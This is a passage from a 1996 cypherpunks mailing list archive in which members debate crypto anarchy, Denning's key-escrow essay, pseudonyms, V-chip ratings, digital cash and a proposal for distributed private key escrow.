reputable vendors or network file servers. The encryption products available
through underground servers and the black market would most likely not
possess as high a quality as products developed through the legitimate market. 

[The Internet itself runs primarily on software developed on the open market
from non-commercial sources without slick packaging.  It seems to have met
with some market acceptance in spite of the lack of shrink-wrap packaging.]

Crypto anarchy is an international threat which has been stimulated by
international communications systems including telephones and the Internet.
Addressing this threat requires an international approach that provides for
both secure international communications crossing national boundaries and
electronic surveillance by governments of criminal and terrorist activity
taking place within their jurisdictions. 

[It's nice to be noticed.  How, exactly, is this voluntary, international,
standards regime going to deal with the desire of different governments to
control different communications.  Look at the problems, some governments
want to ban American movies, the Asian Wall Street Journal, books on the
health of former heads of state, public records of sensational murder
trials, phone calls made using callback services, financial wire services,
novels by leftist co-religionists living in England, email containing the
English word for sexual intercourse (if readable by children),  directions
on where to obtain an abortion in London, etc.  And all these governments
will want to crack private transmissions in order to find those responsible
for these "crimes."  This is going to be a hell of a challenge for a
voluntary, international standards regime.  I think it is probably beyond
the capabilities of such an institution to mediate among all of these
competing desires to control the communications of others.]

DCF

"BTW if one spellchecks the word unescrowed (as in unescrowed encryption)
one is likely to encounter the suggested replacement "unscrewed" (as in
unscrewed encryption).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sat, 27 Jan 1996 08:51:13 +0800
To: trei@process.com
Subject: Re: Secrecy of NSA Affiliation
Message-ID: <199601262146.QAA15541@remus.ultranet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996 15:50:38 -6 you wrote:

>
>Datapoint: My 1967 HB copy of The Codebreakers discusses the 
>agency, and includes a photo of the HQ.
>
>
>Peter Trei
Speaking of which, The Codebreakers is "indefinitely unavailable"
according to the publisher.  Anyone have a spare copy they'd be
willing to part with?  Replies via email, TIA.
						Dan
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.1

mQCNAzEJBEkAAAEEALMsQx6/x+hls0nYThyJnnc3oYl2TaUhH7eUWcC73PeG6oxN
UHlizO/jTmLUNWTj1BSqYfsyXleK0RiETpyyrSycTQE2n+91xJu3kXyWfLOug6K2
Gy0MM/XzV8hwHRYJjugww2hVB6D+C3zDjVo14BvRKmg3d5EowjxHFNui9bAlAAUR
tB5EYW4gQmFpbGV5IDxkYW5AbWlsbGl3YXlzLm9yZz4=
=aNNf
-----END PGP PUBLIC KEY BLOCK-----

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 10:07:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601262228.RAA21968@jekyll.piermont.com>
Message-ID: <Pine.ULT.3.91.960126165731.19154n-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Perry E. Metzger wrote:

> jim bell writes:
> > (For the historically-impaired:  Coventry was/is an English town (small 
> > city?) perhaps most famous from the Lady Godiva legend...but I digress...
> >  British found out, I guess through Ultra, that it was going to be bombed.  
> > Telling the inhabitants would have saved many lives, but (possibly) alerted 
> > the Germans that Enigma had been broken.  British made the correct choice:  
> > Let the city get bombed without (much?) warning.  The value of keeping the 
> > broken-ness of Ultra a secret far outweighed the value of Coventry.)
> 
> The current claim is that, in fact, there was no advance warning about
> Coventry and that the claims that there was are unsubstantiated.

Yeah, far be it from me to debunk an urban legend, but that's what I read 
too.

It is true that there is often more going on than meets the eye, but it is
no less true that it's usually not what you imagine. 

Sure the Brits might have received credible reports that Coventry was 
going to be bombed, and sure the US might have received credible reports 
that Pearl Harbor was going to be bombed. But they also received credible 
reports to the contrary, and decisions were made.

Try working for a newspaper or a hospital some time. You'll hear all sorts
of crazy stories, only a few of which are true. It's hardly obvious which
those are. I'm sure the TLAs get even crazier stuff.

I do not believe that the CIA that failed to find Aldrich Ames and was 
cut out of Iran/Contra as unreliable is not capable of half the things it 
has been accused of. There have been a lot of well-documented and 
acknowledged cases like Operation Success (Guatemala), but the rest is 
just speculation, or worse, an Oliver Stone movie.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 29 Jan 1996 03:39:07 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <m0tfvPA-00092VC@pacifier.com>
Message-ID: <199601262228.RAA21968@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes:
> (For the historically-impaired:  Coventry was/is an English town (small 
> city?) perhaps most famous from the Lady Godiva legend...but I digress...    
>  British found out, I guess through Ultra, that it was going to be bombed.  
> Telling the inhabitants would have saved many lives, but (possibly) alerted 
> the Germans that Enigma had been broken.  British made the correct choice:  
> Let the city get bombed without (much?) warning.  The value of keeping the 
> broken-ness of Ultra a secret far outweighed the value of Coventry.)

The current claim is that, in fact, there was no advance warning about
Coventry and that the claims that there was are unsubstantiated.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 14:30:53 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <m0tfzk0-0008xyC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 AM 1/26/96 -0800, Alan Olsen wrote:
>[Not Perry(tm) approved -- Skip of this offends you]
>
>I am waiting for someone to come out with a product that will modify the
>v-ship (or the various internet "protection" tools) in such a way that it
>scans *FOR* pornography.
>
>Porn is big business.  You would think that people would pay for a way to
>sort through all of that non-smuttiness and just "get to the good stuff".  I
>also imagine that as soon as such a product appears, the censors will scream
>bloody murder.

Sigh!  Wonderful idea, but sadly it probably will never be allowed to work,
for exactly the obvious reasons. (I know that sounds like an odd argumnt to
get from ME, considering MY idea...) 

On the other hand, this would be an EXCELLENT "argument" to bring in front
of a Congressional committee considering the adoption of any V-chip type
proposal.  Once they discover that a ratings system could be used for the
diametrically opposite reasons of their reason for having it in the first
place, they'll try to modify their proposal to prevent this.  

If we're lucky, this'll have the effect of killing the whole concept of
government-sponsored (required?) V-chip-type technology.

OTOH, I agree with other posters who think that truly voluntary content
selection would be an excellent addition to television:  In effect, an
automatic, programmable TV-Guide search engine.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 27 Jan 1996 08:41:10 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Guilt by Association?
In-Reply-To: <ad2c816d06021004e749@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960126175847.5265B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Timothy C. May wrote:

> At 2:49 AM 1/25/96, Alan Olsen wrote:
> 
> >This is a problem with the web of trust in general.  It is known as "Guilt
> >by Association".
> >
> >Person X commits treasonable act A.  All of the persons who are signed on to
> >his key could be considered to be co-conspirators.  The same applies to
> >nyms.  The difficulty with prosecuting nyms is finding the link to the real
> >world individual.  Anyone associated with him/her/it will be considered to
> >be guilty by reason of key signage or a way of determining who the real
> >person is...
> ....
> >I guess we are stuck with the "Web of Guilt"...
> 
> Although I disagree with many things the U.S. government has declared
> unlawful, and think we are on the wrong track in many ways, I don't see any
> evidence for a "web of guilt."
> 
> I could have signed the keys of Timothy McVeigh, O.J. Simpson, and Hilary
> Clinton, and yet this would not cause any prosecutor to indict me, per se.
> (Brian Davis, do you disagree?) Obviously if one of these persons I was
> known to have associated with, to the point of signing their keys, were
> under investigation, then some detectives might follow up some leads to
> find out who I was. This is ordinary detective work, not guilt by
> association.

I agree.  Signing the key might get you a visit from an agent with 
questions about your relationship with whoever, but you would not (at 
least to me) become a target of the investigation without a **whole lot** 
more than a mere key signing.

Speaking only for myself (as always).

EBD

> 
> Key-signing is overrated, in my view. It is just an affidavit from someone
> that they think a person is related to a key. I've signed a few keys (not
> many, and don't ask me to!), and I've never once asked for any form of
> state-sanctioned ID.
> 
> --Tim May
> 
> Boycott espionage-enabled software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 11:02:44 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: Re: weak cryptoanarchy
In-Reply-To: <199601270114.CAA15160@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.960126180313.19154p-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I don't think anarchy is the right word anyway. Anarchy is such a clumsy
word, with so many misuses. It's supposed to mean lack of rule, but I 
don't think most people (even Tim) want to throw away all the rules; they 
just prefer consensus, balance of power, and self-regulation. Maybe 
autoarchy or symarchy.

I find the distiction between government and non-government power centers
fallacious. All kinds of associations make rules, which are normally
followed, sometimes punished. The only formal distinction I can think of
is that government bodies are supposed to have a monopoly on the
legitimate use of violence. 

This distinction is blurring again, and not (just) by the increase of
random violence, which normal folks are afraid of. People are becoming
more civilized, and no longer believe that many of the violent things that
governments used to do habitually are legitimate anymore. Nobody does
ritual sacrifice to the ruler-god-king; few would now endorse locking the
King's estranged wife in a tower, or killing her; fewer and fewer believe
that war is glorious. 

On the other half of the walnut, non-government power centers now have
powers formerly reserved only to governments. Private security guards
assume some of the role of the police, and corporate espionage and
counter-espionage is getting more and more interesting. "Superstars" in 
all fields have interesting powers over other people.

We're not seeing a net decrease in the forces impinging on the individual,
but rather a broader distribution, which might even be an increase. 

Let's call those half-developed ideas my $0.01.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Jan 1996 02:44:10 +0800
To: cypherpunks@toad.com
Subject: Re: [rant] A thought on filters and the V-Chip
In-Reply-To: <m0tfzk0-0008xyC@pacifier.com>
Message-ID: <Pine.ULT.3.91.960126182329.19154q-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, jim bell wrote:

> At 11:56 AM 1/26/96 -0800, Alan Olsen wrote:
> >[Not Perry(tm) approved -- Skip of this offends you]
> >
> >I am waiting for someone to come out with a product that will modify the
> >v-ship (or the various internet "protection" tools) in such a way that it
> >scans *FOR* pornography.
> >
> >Porn is big business.  You would think that people would pay for a way to
> >sort through all of that non-smuttiness and just "get to the good stuff".  I
> >also imagine that as soon as such a product appears, the censors will scream
> >bloody murder.
>...
> On the other hand, this would be an EXCELLENT "argument" to bring in front
> of a Congressional committee considering the adoption of any V-chip type
> proposal.  Once they discover that a ratings system could be used for the
> diametrically opposite reasons of their reason for having it in the first
> place, they'll try to modify their proposal to prevent this.  
> 
> If we're lucky, this'll have the effect of killing the whole concept of
> government-sponsored (required?) V-chip-type technology.
> 
> OTOH, I agree with other posters who think that truly voluntary content
> selection would be an excellent addition to television:  In effect, an
> automatic, programmable TV-Guide search engine.

While it's hard to find a general theme here, I think I disagree. Anyway, 
I don't think that even truly voluntary content selection is a good idea, 
because it reduces art to numbers, which is wrong.

Rating the amount of sexual content tells you nothing when comparing 
D.H. Lawrence, the Marquis de Sade, Showgirls, and Playboy.

Rating the amount of violence tells you nothing when comparing All Quiet 
on the Western Front, Repo Man, Faces of Death, and Platoon.

Rating the amount of political content tells you nothing when comparing 
JFK and The Green Berets.

Rating the amount of religious content tells you nothing when comparing 
Jesus Christ Superstar, The Last Temptation of Christ, and The Argument.

You shouldn't try to engineer art.

Classification systems lead to a balkanization that diminishes the common
culture. I think it was good the way network TV was limited to the lowest
common denominator, but with variety. People who wanted something with a
little more flavor than WonderBread [tm] were able to find it, but they
did have to look, which often involved *meeting other people* with common
interests, and they still tuned in to Ed Sullivan to see what the Joneses
were watching. Give people 1024 bits' worth of channels to choose from,
classified by arbitrary criteria involving no human contact, and you get
something entirely different. I'm not sure what's happening now, but I
don't think I like it. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Jan 1996 02:42:10 +0800
To: cypherpunks@toad.com
Subject: Re: Doctor Denning
Message-ID: <m0tg0Y3-00092BC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:52 PM 1/26/96 -0800, Timothy C. May wrote:

>>What I found interesting was the lack of meat behind
>>"Crypto Anarchy is Not Inevitable".  It seemed to boil
>>down to the vacuous "if everyone could just agree that key
>>escrow is a good thing, there would be no problem".
>
>This is the main reason I haven't bothered to rebut her points: there were
>essentially none to rebut.
>
>(There are substantive criticisms of my points that can be made, including
>discussions of what might be done to delay or even head off crypto anarchy
>completely. I had dinner a few nights ago with David Friedman, author of
>"The Machinery of Freedom," and he made some incisive comments about how
>the State might go about heading off this future. I'm glad he's on our
>side, and not the government's.)
>
>Two other reasons I have not sought to rebut her analysis:
>
>First, I doubt many people saw either my original article (available on Bob
>Hettinga's page: http://thumper.vmeng.com/pub/rah/anarchy.html) or
>Denning's reaction article.
>
>Second, I stated my views, she stated her views, not much more to say.
>Especially as she has not had an active presence on the Net, either in
>talk.politics.crypto or in other forums I have seen, and thus a real debate
>on the Net has not been possible.
>
>Mostly I know I can't change her views, so why bother? Other people may
>have their views affected by what I say, and for these people I have
>certainly written enough.


Tim, trust me on this one.  Dorothy Denning doesn't have a PRAYER.  You 
already believe it, but I _KNOW_ it!


Jim Bell

Klaatu Barada Nikto.     This will become important...soon

Something is going to happen.  Something...wonderful!


(BTW, the above few lines, which looks like a canned signature, is not.
Careful readers will note that I keep typing it in, which means that it
isn't identical every time.  This should be a clue to all you lurkers out
there that I MEAN this; it's not just an idle macro.

(It also means that I'm going to have to RTFM on my Eudora to do automatic
signatures, but that's an ENTIRELY different story.)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQmQGfqHVDBboB2dAQF3lwP+JzEaN+sR9PdvnaWf2EnWJuDddZs86GbS
cO7t+BLb/ALvAExBhBmVhMbYU1lFQS92akUQoMXBM/TLf330QR7E0FOjBdv12rqg
n4RfFN7xV6Stib7gDOl2Q2niNqBusIzXT5Isv1A7x4NGF5Yxu7fVtUJ52tRBxHFI
9V+68Z21E4c=
=SCkf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 27 Jan 1996 09:14:54 +0800
To: cypherpunks@toad.com
Subject: Re: Nym use in the real world
In-Reply-To: <199601261801.KAA07578@slack.lne.com>
Message-ID: <Pine.LNX.3.91.960126183440.706A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jan 1996, Eric Murray wrote:

> 
> 
> 
> With the coming Internet restrictions and growing use of the
> net by LEAs, it's become obvious to me that I shouldn't post
> messages with my real name.  But I have some problems/questions about
> using a nym:
> 
> 1. reputation.  My nym will need to build it's own reputation, I know.
> But I currently get offers of work based on my reputation and posts.  I
> would like this to continue.  When it comes time to do the work and
> collect the pay, I need to tie my nym to me.  Reasons: only the
> most adventurous firms would hire someone to do work without knowing
> their real name.  I also need to have the proper forms (1099 etc)
> filed.  I know that a lot of people on the list would say that I shouldn't
> file taxes, but I am (currently) willing to pay the price to stay
> out of jail.

Reputations are usefull for more than just getting a job.  If a nym developes
reputation, people may be more likely to trust (or not, depending on the kind
of reputation the nym has earned) a post or e-mail sent from that nym than from
someone who has no reputation.
> 
> The other problem (tying the nym to RealName) for employers is
> more severe.  A nym is only good when no one can tie it to your
> real name.  If I have to tell everyone I do work for what my real
> name and nym is, soon enough people will be able to tie the two that
> the nym becomes nearly useless.
> 

It is possible to have more than one nym.  You could use each nym to develop
a different reputation.  For instance, one nym could be very knowledgable in
the field of cryptography, and another could be a really good golf player.
There is no reason for anyone to know that these two nyms are used by the same
person because most people on a newsgroup like rec.sports.golf probably
couldn't care less about your interest in cryptography.

> 
> 2. does it (a nym) really help?  Police and governments are used to
> dealing with people who change their names, use fake names, etc.
> I get the impression that having multiple/fake names is considered by police
> to be evidence or at least indication of guilt.  "If you're not guilty
> why're you hiding?".
> 
> Using a nym would at least help with the problem of police or
> other parties searching through Dejanews/Altavista for my posts for
> incriminating evidence.  But if my nym is investigated for some future
> crime (fuck Exon) and my nym isn't secure enough to protect my
> RealName, it will be a liability.
> 
> 
> Thoughts?
> 
> 

I do think that in any situation where both anonymity and reputation are
desired, nyms are of great use.  When you need reputation and not
anonymity, True Names should be used. 

- --
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
PGP: Because sometimes, a _Captain Midnight_ decoder ring simply
isn't enough.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQloG7Zc+sv5siulAQFrcQP/Tx5t/xGrDn6EOQkFArmBcw4SLrnpvxka
VhQsKLPutXaisVqPAwLBnlaXzl/ic4yKfSoH/yTFqeta4WLSg4W3MJgw4+Ijv9JJ
UQsjG/2D9mABLn4WCYeS1bHOLWShe2yOg22OSaYnXVpSZ49B0Gr29cA3BgiEPYNr
noNSF370WQk=
=vziR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 11:50:04 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.SV4.3.91.960126211149.24886C-100000@larry.infi.net>
Message-ID: <Pine.ULT.3.91.960126184545.19154r-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Alan Horowitz wrote:

> > In fact, before FDR, wage income was taxed; however, it was one large 
> > check at the end of the yeraar (or the beginning of the next, really).
> 
>   I think this wrong. Read the definition of "income" before the WWII. 
> Wages were considered to be an equal exchange for labor services 
> rendered, not a "gain" (income).

I think you've been reading too many tax protester pamphlets without 
enough fresh air. Try posting the above to misc.taxes or misc.legal and 
you'll get several detailed responses.

Unfortunately, several will be wrong, because most knowledgeable people 
are turned off by the drivel, and the .moderated groups will reject 
postings on subjects that were long ago beaten to death.

> > The high cost of WW II made it a necessity for the gvm't to have more 
> > money at a particular moment, and not wait for year-end.
> 
>     Not so. Govt has been able to print fiat money at will since the Fed 
> Reserve was founded in 1913.

Er, yes, and fiat money means inflation. Real value takes real money.

> > the income tax was passed; however, the income tax (and wage income was 
> > most certainly taxed) was AFAIK implemented by the end of the 19th century.
> 
>      That income tax was overthrown by the Supreme Court as not being 
> apportioned amongst the states, as required by the Constitution.

And as a result, there was the 16th Amendment.

>      Technically, the income tax is an excise, not a tax. They aren't the 
> same.

?

Nevermind.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Fri, 26 Jan 1996 16:17:02 +0800
To: cypherpunks@toad.com
Subject: Re: "Concryption" Prior Art
Message-ID: <199601260604.TAA27250@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Death rays from Mars made pcw@access.digex.net (Peter Wayner) write:

>I haven't read the supposed Concryption patent so I don't know
>what the claim structure is. But if they truly claim the right
>to do encryption and compression simultaneously, then I've got
>some prior art that should knock out such a broad claim. The
>paper is "A Redundancy Reducing Cipher" (Cryptologia, May 88).
>It's not very secure, but it does do some manner of encryption
>at the same time as compressing a file with a Huffman-like
>system. The journal is found in many university libraries so it
>should be easy to produce a solid counterclaim.

There's a much earlier paper by Frank Rubin in a 1979 Cryptologia which
covers encryption+compression with Huffman and arithmetic coding.
However the Con-cryption patent covers first compressing, then
encrypting.  Unless they've got very good lawyers, you can probably
ignore it.

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 12:05:57 +0800
To: Alex Strasheim <tcmay@got.net (Timothy C. May)
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <m0tg10q-0008yQC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 1/26/96 -0600, Alex Strasheim wrote:
>
>Digicash is probably the first significant crypto product to be exported
>to America.  It's not very popular yet, but I think that most of us here
>agree that it is, in potential at least, as significant as
>Mosaic/Netscape.  It's important to note that this extremely important
>product couldn't have been produced here, patents aside.  Transaction
>systems need to be international, and our rules make America an unsuitable
>place from which to launch tranaction software.
>
>Will the NSA be able to stand up against growing economic pressures?  I 
>don't know.  But it does seem pretty clear that those pressures are 
>building all the time, and that the problem of supressing crypto in 1996 
>is a much tougher one than it was in 1986.
>
>In general, it's myopic and ill advised to focus on one factor -- 
>economics, politcs, the national security establishment -- when trying to 
>predict what will happen.  I've probably been guilty of placing too much 
>emphasis on money, and not enough on the NSA.
>
>We do seem to be winning, though.

Agreed.  However, we will all REALLY win when
anonymous-payer/anonymous-payee digital cash appears and is in common usage.
(or Digicash can be "munged" to make payee-anonymity possible, if not the norm.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 27 Jan 1996 10:05:36 +0800
To: cypherpunks@toad.com
Subject: Can't be THAT Fred Cohen :-)
In-Reply-To: <960126080515.ZM21151@scherg>
Message-ID: <F87BiD49w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


From: gary.schermerhorn@nyapps01.gsam.gs.com (Gary Schermerhorn)
Date: Fri, 26 Jan 96 08:13:56 EST
Message-Id: <960126080515.ZM21151@scherg>
Subject: Question

Does anybody know a consultant named Fred Cohen?  I'm doing some
background work.  Please get back to me if you know him.

--
Gary Schermerhorn                  (scherg@gsam.gs.com)
Goldman Sachs Asset Management
1 New York Plaza, 42nd Floor
(212) 902-3344 (phone), (212) 428-1008 (fax)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 12:23:04 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's misleading statements
In-Reply-To: <Pine.SUN.3.91.960126222026.8591A-100000@reggae.src.umd.edu>
Message-ID: <Pine.ULT.3.91.960126194558.19154u-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Thomas Grant Edwards wrote:

> I think the big bait-and-switch is her description of the various 
> companies falling over themselves to get to _VOLUNTARY_ key escrow to 
> avoid losing data and protecting themselves against employee problems 
> versus _MANDATORY_GOVERNMENT_ key escrow to ensure that individuals 
> cannot hide information from the government.
> 
> Key escrow is good.  Key escrow against your will is bad.

Yo.

I especially enjoyed this sentence: "Individuals would be allowed to
develop their own encryption systems for personal or educational use
without obtaining licenses, though they could not distribute them to
others."

It's unclear whether it's OK to share books, algorithms, and source code; 
or if it is, what's the point?

Outlaw cryptography, and only cryptographers and outlaws will have 
cryptography.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jan 1996 11:03:45 +0800
To: cypherpunks@toad.com
Subject: Re: weak cryptoanarchy
Message-ID: <ad2ecda71f0210041a54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:14 AM 1/27/96, Anonymous wrote:

>I think a better prediction for the implications of strong
>crypto is what I would call "weak cryptoanarchy."  That is,
>cryptography will allow virtual communities the option to exist
                         ^^^^^^^^^^^^^^^^^^^
>without the possibility of inteference by force.  Certainly some
>virtual communities, such as moderated discussion groups, will
>opt to have formal or informal governments.  The key is that
>people will have the choice of participating in communities
>where physical violence will be absolutely powerless.
>
>Stated in this form, cryptoanarchy is hardly controversial.
>Plus, this weak form of cryptoanarchy has a much better chance
>of being realized, because it does not require the collapse of
>existing governments, only the creation of new communities
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>without governments.
 ^^^^^^^^^^^^^^^^^^^

The paper which Prof. Denning was responding to was my paper, "Crypto
Anarchy and Virtual Communities." Seems like I anticipated your point.

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 27 Jan 1996 09:55:15 +0800
To: cypherpunks@toad.com
Subject: Re: Doctor Denning
In-Reply-To: <Pine.BSD/.3.91.960126150104.16758A-100000@l0pht.com>
Message-ID: <Pine.3.89.9601261909.A102260-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 26 Jan 1996, Weld Pond wrote:

> If found this interesting too.  I was waiting for the reason it wasn't
> inevitable but it never came.  Denning seems willing to predict a future
> where there are no more technical advances in fields like steganography and
> dc nets.  
Or for that matter that the present ones will never get implemented.

Poor prof Denning...It strikes me as though her essay is a close 
relative of "Reefer Madness", a supposedly hilariously rabid (I'm told)
anti-pot video which only potheads ever bother watching. The only people
who will read her webpage are us cypherpunks. Should by some 
randomly-generated act of pot luck, anyone other than us read her ~38 pg.
rant, that person (non-LEA, of course) will probably be entertained enough
to join the list and read Tim's writings (only a search engine away).

It is also convenient that most of the search engines list multiple 
occurences of the list archives, every time a search on cryptography
keywords is performed. (The archives don't list the majordomo address, could 
this be the reason why we constantly get so many "subscribe me!" posts? 
Waaay to go Dorothy!)

Somehow, I don't think her choice of medium is going to get her very far.
I wonder what a second edition of her crypto book would look like.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 12:35:25 +0800
To: cypherpunks@toad.com
Subject: Why key escrow is good (was Re: FWD: Internet e-mail)
In-Reply-To: <9601270226.AA18376@mhv.net>
Message-ID: <Pine.ULT.3.91.960126190029.19154s-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I'm sure all the points I'm making are really old news, but the fact
remains that I do not see distributed private key escrow applications, 
infrastructure, or advocacy, and I think there should be some.]

On Fri, 26 Jan 1996, Lynne L. Harrison, Esq. wrote:

> The following was posted to another list.  Has anybody heard about this?
> [Gee, I _wonder_ if there will be escrowed keys...]
> 
> ******Begin Forwarded Message*********
> >I just read in "legal.online" that the Postal Service plans to provide
> >secure email service.  It will include encryption plus offer U.S. mail fraud
> >protection.  Of course there is no estimate on cost.

Of course it will be escrowed. It will probably have other back doors too.
The customers will demand it. 

Most normal people don't want unescrowed strong cryptography. If they
forget their password, they want a way to get their stuff back. If they
die, they don't want their thoughts to die with them. They don't plan to
commit a major felony or, worse, run for public office, so the prospect
that a government (or someone else) will subpoena or strong-arm the keys
isn't a serious problem. 

I see no problem with this.

The problem is *government* key escrow, especially *exclusive* government
key escrow, which has none of the recoverability benefits that the average
clueless user would want associated with key escrow. 

I'd like to see strong crypto that supports distributed key escrow by 
default (of course there should be a way to turn it off). Give parts of 
your key to, say, ten people, and require that eight must concur in order 
to break into your stuff.

I would have few objections to a *properly drafted* law requiring widely
distributed key escrow *for certain applications*. It's certainly bad to
require escrow in two Federal clearing houses, and we'd have to think hard
about requiring that key escrow agencies be licensed and regulated. In
order to intercept my private communications, the government would need to
subpoena the people I trust, not itself. 

I'd feel secure, and in fact *better* than I feel about unescrowed strong
crypto, if my private stuff could be cracked by either myself in good mind
and body, or a combination of at least eight of: 

1. My boss
2. My best friend
3. My parents
4. The FBI (they get *one*, and the reason is to make it tougher for 
   nasty non-government bodies to strong-arm enough parts of my key)
5. The California Department of State (as above)
6. The Cypherpunk Escrow Agency in Berkeley
7. The Cypherpunk Escrow Agency in the Cayman Islands
8. The corner 7-11
9. Mail-order Escrows-R-Us
10. TRW

Gives a whole new meaning to the term "web of trust." By offering a piece
of your key, you're entrusting a part of your life; and by accepting a
piece of someone's key, you're agreeing to defend it with yours (life or
key, whatever -- presumably you would encrypt the keys you're escrowing in
your own escrowed key, which can be brute-forced in several ways). 

I'd like to see spring up a whole industry of both mom & pop and
institutional key escrow agents. In a way, it's kinda like those silly
cryogenics people who freeze their heads in the hopes of rising from the
dead. The only way my private thoughts can survive my death, senility, or
a really sharp blow to the head is escrow. And *I* think that at least
some of the things I would normally keep to myself are worth preserving.
Sure the world would survive without them, but we're talking about my ego
here. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

